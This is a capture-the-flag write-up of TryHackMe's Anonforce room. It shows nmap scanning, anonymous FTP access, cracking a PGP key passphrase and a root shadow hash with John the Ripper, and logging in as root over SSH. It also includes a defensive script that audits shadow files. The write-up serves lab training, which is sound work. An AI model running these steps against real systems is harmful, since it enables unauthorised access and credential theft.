CTF

TryHackMe Anon Force WriteUp

Hello friends, today we will solve the Anonforce room on the TryHackMe platform. First we connected from our terminal with our VPN configuration file and started the machine. We wait for the IP address to appear; once it arrives, we start with an nmap scan.

nmap -sC -sV -p- <ip_adres>

We start our scan with this command.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
| drwxr-xr-x   17 0        0            3700 Jan 31 01:49 dev
| drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
| drwx------    2 0        0           16384 Aug 11  2019 lost+found
| drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
| drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
| drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread [NSE: writeable]
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
| dr-xr-xr-x   96 0        0               0 Jan 31 01:49 proc
| drwx------    3 0        0            4096 Aug 11  2019 root
| drwxr-xr-x   18 0        0             540 Jan 31 01:49 run
| drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
| dr-xr-xr-x   13 0        0               0 Jan 31 01:49 sys
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.174.127
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA)
|   256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA)
|_  256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.09 seconds

Yes, as we can see here, anonymous login over FTP is allowed; now let's log in.

┌──(kali㉿kali)-[~]
└─$ ftp 10.82.164.133
Connected to 10.82.164.133.
220 (vsFTPd 3.0.3)
Name (10.82.164.133:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||31102|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
drwxr-xr-x   17 0        0            3700 Jan 31 01:49 dev
drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
drwx------    2 0        0           16384 Aug 11  2019 lost+found
drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread
drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
dr-xr-xr-x   85 0        0               0 Jan 31 01:49 proc
drwx------    3 0        0            4096 Aug 11  2019 root
drwxr-xr-x   18 0        0             540 Jan 31 01:49 run
drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
dr-xr-xr-x   13 0        0               0 Jan 31 01:49 sys
drwxrwxrwt    9 0        0            4096 Jan 31 01:49 tmp
drwxr-xr-x   10 0        0            4096 Aug 11  2019 usr
drwxr-xr-x   11 0        0            4096 Aug 11  2019 var
lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic
226 Directory send OK.
ftp>

We got in. There is a folder named notread here that looks interesting; let's go into it.

ftp> cd notread
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||30584|)
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
226 Directory send OK.
ftp>

Now we will pull these files down to our own machine.

ftp> get backup.pgp
local: backup.pgp remote: backup.pgp
229 Entering Extended Passive Mode (|||31895|)
150 Opening BINARY mode data connection for backup.pgp (524 bytes).
100% |************************************************************************|   524        3.59 MiB/s    00:00 ETA
226 Transfer complete.
524 bytes received in 00:00 (7.57 KiB/s)
ftp> get private.asc
local: private.asc remote: private.asc
229 Entering Extended Passive Mode (|||9641|)
150 Opening BINARY mode data connection for private.asc (3762 bytes).
100% |************************************************************************|  3762        6.19 MiB/s    00:00 ETA
226 Transfer complete.
3762 bytes received in 00:00 (50.82 KiB/s)
ftp> exit
221 Goodbye.

Now we will do the password cracking, and we will use john:

gpg2john private.asc > gpg_hash.txt

We extract the hash from the private.asc file and crack it with John the Ripper.

┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt gpg_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xbox360          (anonforce)
1g 0:00:00:00 DONE (2026-01-31 04:57) 20.00g/s 18600p/s 18600c/s 18600C/s xbox360..sheena
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password came out as xbox360.

┌──(kali㉿kali)-[~]
└─$ gpg --import private.asc
gpg: keybox '/home/kali/.gnupg/pubring.kbx' created
gpg: /home/kali/.gnupg/trustdb.gpg: trustdb created
gpg: key B92CD1F280AD82C2: public key "anonforce <melodias@anonforce.nsa>" imported
gpg: key B92CD1F280AD82C2: secret key imported
gpg: key B92CD1F280AD82C2: "anonforce <melodias@anonforce.nsa>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

┌──(kali㉿kali)-[~]
└─$ gpg --decrypt backup.pgp
gpg: encrypted with elg512 key, ID AA6268D1E6612967, created 2019-08-12
      "anonforce <melodias@anonforce.nsa>"
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18120:0:99999:7:::
uuidd:*:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
ftp:*:18120:0:99999:7:::
┌──(kali㉿kali)-[~]
└─$

Having imported the key, we opened the second file as well; when it asks for the passphrase on screen, we type xbox360 and press Enter. The extracted shadow entries also show the root user's hash. Now I create a hedef.txt file and put the root entry into it.

nano hedef.txt

root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0

We run john and crack it.

┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hedef.txt
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt"
Use the "--format=md5crypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hikari           (root)
1g 0:00:00:01 DONE (2026-01-31 05:00) 0.6250g/s 4320p/s 4320c/s 4320C/s 98765432..better
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

From here we have found the root user's password as well.
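The shadow dump and john's warning above ("also saw type md5crypt") are exactly what a defender would audit in /etc/shadow. The following is an added example, not part of this writeup: a small Python audit that parses shadow lines (sample constructed from the entries above), flags md5crypt/descrypt hashes, sha-crypt entries left at the default 5000 rounds, empty password fields, and a root account that still has a usable password hash. The min_rounds threshold is my choice for this example, not a value from the page.

```python
# Constructed from the shadow dump above: root (sha512crypt), a locked system
# account, melodias (md5crypt) and sshd (locked).
SAMPLE_SHADOW = """\
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17953:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
"""

# crypt(3) scheme identifiers found between the first two "$" signs.
HASH_IDS = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt",
}
# Schemes a wordlist attack chews through quickly on an ordinary laptop
# (john's own rate lines above show the difference).
WEAK_ALGOS = {"md5crypt", "descrypt"}
SHA_CRYPT_DEFAULT_ROUNDS = 5000   # the "Cost 1 (iteration count) is 5000" john reported


def parse_shadow_line(line):
    """Return user, state (empty/locked/hashed), scheme and rounds for one shadow line."""
    fields = line.split(":")
    user, pw = fields[0], fields[1]
    entry = {"user": user, "state": "hashed", "algo": None, "rounds": None}
    if pw == "":
        entry["state"] = "empty"          # no password at all
    elif pw.startswith(("*", "!")):
        entry["state"] = "locked"         # password login disabled
    elif pw.startswith("$"):
        parts = pw.split("$")             # ["", id, "rounds=N"?, salt, hash]
        entry["algo"] = HASH_IDS.get(parts[1], "unknown")
        if entry["algo"] in ("sha256crypt", "sha512crypt"):
            entry["rounds"] = SHA_CRYPT_DEFAULT_ROUNDS
            if parts[2].startswith("rounds="):
                entry["rounds"] = int(parts[2][len("rounds="):])
    else:
        entry["algo"] = "descrypt"        # legacy 13-character DES hash
    return entry


def audit_shadow(text, min_rounds=100000):
    """List (user, problem) pairs. min_rounds is this example's threshold, not a page value."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = parse_shadow_line(line)
        if e["state"] == "empty":
            findings.append((e["user"], "empty password field"))
        elif e["state"] == "hashed":
            if e["algo"] in WEAK_ALGOS or e["algo"] == "unknown":
                findings.append((e["user"], f"weak or unrecognised hash scheme: {e['algo']}"))
            elif e["rounds"] is not None and e["rounds"] < min_rounds:
                findings.append((e["user"], f"{e['algo']} with only {e['rounds']} rounds"))
            if e["user"] == "root":
                findings.append(("root", "root still has a usable password hash; disable password login for root"))
    return findings


if __name__ == "__main__":
    for user, problem in audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {problem}")
```

On this box the audit reports both accounts that john cracked and nothing for the locked system accounts; the root finding matches what the next step shows, a password SSH login as root.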

┌──(kali㉿kali)-[~]
└─$ ssh root@10.82.164.133
The authenticity of host '10.82.164.133 (10.82.164.133)' can't be established.
ED25519 key fingerprint is: SHA256:+bhLW3R5qYI2SvPQsCWR9ewCoewWWvFfTVFQUAGr+ew
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.82.164.133' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
root@10.82.164.133's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-157-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
f706*******************
root@ubuntu:~#

We got the root flag, but we got it before user.txt :)

root@ubuntu:~# cd /home
root@ubuntu:/home# ls
melodias
root@ubuntu:/home# cd melodias/
root@ubuntu:/home/melodias# ls
user.txt
root@ubuntu:/home/melodias# cat user.txt
60****************************
root@ubuntu:/home/melodias#

We go in and grab user.txt.
SUCCESS: Root privileges obtained.